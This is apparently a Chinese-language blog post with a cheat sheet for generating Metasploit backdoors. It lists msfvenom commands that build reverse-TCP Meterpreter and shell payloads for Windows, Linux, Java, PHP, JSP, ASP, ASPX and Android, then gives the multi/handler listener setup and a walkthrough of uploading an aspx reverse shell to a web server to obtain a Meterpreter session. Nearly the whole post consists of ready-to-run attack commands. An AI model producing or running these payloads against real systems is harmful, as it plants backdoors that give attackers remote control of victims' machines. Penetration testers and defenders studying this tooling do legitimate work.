News:禁止使用本博客的技术文章、源码、工具等用于非法用途,否则后果自负。

Metasploit之多种后门生成

jasonx 305 0 条

Metasploit之多种后门生成

参考文献:http://netsec.ws/?p=331

      http://www.ithao123.cn/content-10813776.html
      http://www.evil0x.com/posts/838.html(Metasploit 渗透测试笔记(Meterpreter篇))

本章节的后门有以下几种

windows

使用模块“windows/meterpreter/reverse_tcp”
命令:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=8081 -f exe > 6666.exe
参考“09-Metasploit之我的远程控制软件”

linux

使用块“linux/x86/meterpreter/shell_rverse_tcp”
命令:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 X >text
参考文章:http://xiao106347.blog.163.com/blog/static/215992078201310253172937/

java

使用模块“java/meterpreter/reverse_tcp”
命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 W >text.jar

php

使用模块“php/meterpreter/reverse_tcp”
命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw >text.php

kali监听:

use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set lhost 192.168.1.33
set lport 8083
exploit

参考文章:http://www.111cn.net/phper/phpanqn/101228.htm

jsp

使用模块“java/jsp_shell_reverse_tcp”
命令:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.146 LPORT=1234 R >text.jsp
参考文章:http://netsecurity.51cto.com/art/201406/442648.htm

asp

使用模块“windows/meterpreter/reverse_tcp”
命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f asp > shell.asp
参考文章:http://www.ithao123.cn/content-10813776.html

aspx

使用模块“windows/meterpreter/reverse_tcp”
命令:msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx
参考文章:http://www.ithao123.cn/content-10813776.html

android

使用模块“android/meterpreter/reverse_tcp”
命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 R >text.apk
参考“13-Metasploit之渗透安卓实战”

反弹连接的访问:
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z


Metasploit-web渗透
参考文献:http://www.ithao123.cn/content-10813776.html

首先用Metasploit生成反弹马,也就是生成反弹的payload:
成功生成反弹型payload:

(1)

生成win下的exe
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5566 -f exe x> /home/niexinming/back.exe

(2)

生成win下的aspx
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx
其他的生成payload 的方法见:http://netsec.ws/?p=331

(3)

我生成一个aspx的反弹马

然后启动msfconsole

(4)

本地监听,反弹后的控制端:use exploit/multi/handler

(5)

本地监听的确定用哪个payload:
set payload windows/meterpreter/reverse_tcp

(6)

设置本地监听的端口:
set lport 7788

(7)

设置本地的监听的地址:
set lhost 0.0.0.0

(8)

运行:
run

(9)

访问生成的反弹马:
http://xxx.xxx.xx.xxx:/back.aspx

得到meterpreter的shell

与本文相关的文章

发表我的评论

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址